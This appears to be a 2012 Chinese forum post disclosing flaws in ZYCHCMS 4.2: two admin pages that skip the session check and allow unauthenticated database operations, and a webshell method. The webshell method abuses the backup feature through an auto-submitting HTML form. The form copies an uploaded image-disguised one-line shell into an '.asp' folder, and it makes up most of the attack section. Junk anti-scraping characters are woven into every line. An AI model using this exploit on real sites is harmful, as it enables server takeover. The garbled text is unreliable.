, [6 o/ Q5 m0 u1 N/ ?
. P4 z6 T5 \4 e: `
' t) O; k2 j. f" |% ]/ z
/ u8 r" r9 O& T5 m3 S( K7 V @6 l
影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)& ] x. t6 T9 ]9 q! K8 ]
①SQL注射漏洞! V' I& u2 M/ z* z6 |$ T# }
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp
1 P" ?; P9 w9 y' K O( @/ w 漏洞原因:未过滤3 J0 V7 i1 ^) b
漏洞代码:& N- z6 F" [ {3 D4 m2 V
都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。3 D: Z: o4 t" `1 a
修复方法:在文件开头加入代码
$ l+ B% i8 V7 j# J , O6 p8 _0 { J* S% ?) M0 b' f
9 o% V9 n3 n: \: S+ K
②后台拿WBSHELL
$ t" R/ l" F+ N, V 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
( U' y0 j. K5 O 这里在网上找了一个,改了下,将就着用。
1 z& r' [& s: |/ v! ] 以下是代码本地提交代码! ]/ J8 L9 |. }' p
' H" L( H y9 L6 Q# X
3 `4 b6 i/ H1 S1 {
<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>
' `% G4 B0 V P3 k3 z* B4 q <!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>
. h+ A5 T% C! }3 g# a <tr>
1 i+ Z% D# s) r <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>0 y5 P. S [6 Z% v2 V1 N
</tr>
1 G9 i- r! ?7 T <tr>
7 F1 I, x% G8 e$ @) ], W <td bgcolor=”#FFFFFF”><span class=”back_southidc”>, P% m, a3 { [, f5 D
</span>* K5 y+ A- _# m/ v' d2 L4 q
<table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >
# K2 @0 }& S3 O# A( F. ^ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
& |( Y' Z) c$ x( B% q" [( C) j <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>
% _) t) i" t4 x" H/ x |3 o! n1 a" T <td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d4 k$ m& ~; q3 ]3 T9 y
<div align=”left”>
. ]0 K8 Z6 T Q0 H <input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />2 ]9 ~# J3 n- @6 c( _! D
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>1 z, E9 f6 X% W; _( [; a/ U
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />! ]6 C3 @8 I+ _' A* \6 {5 p9 c
</div></td>
0 t% N l, d2 n% T" t4 k Q3 d </tr>+ }1 E& v' ^+ A Z5 `
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
2 L0 h$ s5 k: }) A1 y' C. A$ k <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>: r C) c" t# m8 B
<td class=”td”><div align=”left”>
: ?- c4 J- v4 i0 J <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />
3 e2 J* h$ r( ^; O5 `+ K2 o, N, [" \ [如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
+ N: _0 [8 A& A" H% g5 y' ?& ?( s </tr>
9 ] y& S U1 o. b t <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
* \, A0 u1 @8 W" C% _/ I <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>4 u6 S7 B2 w2 h7 y7 ?
<td class=”td”><div align=”left”>
. v7 \1 w# O# N0 I3 o' N <input type=”submit” value=”确定备份” class=”btn”8 Z5 \) R& b {( [. N- Y3 C# ~4 j
</div></td>
. W6 Y& Y2 S1 R! M" n </tr>
0 O" V; h, l* f' F" c </table></td></tr></form>+ b0 p; O. L. [& t3 A
</table>
8 ?3 A4 M5 v# M$ m. N+ P </td># W& @# u- ~# `
</tr>
5 o& N" W9 J' V3 X </table>
+ }8 A. z3 V( n4 }! a5 { <script>
) \2 `+ r! c2 e/ I5 L! ` document.all.add.submit();, k% [1 g0 z& ]8 n- B4 X2 z
</script>
; ] p8 S* Z* J, V- |9 v
C' R& b7 S8 b* J& P1 J w+ t- u; V- k! \( E
- m2 @1 x0 c7 q0 }
& |0 R: E# {3 z9 \: T3 @9 d. p6 ~0 m
. U' ]7 U/ d( Q
d! G1 b q; r0 r3 C
0 |- [+ O& c" ^, Y& o6 l; ]! q4 D* C( ^7 l
3 L. |7 b% w# G% L8 b6 Q' b |
发表于 2012-9-10 21:09:51
收藏
支持
反对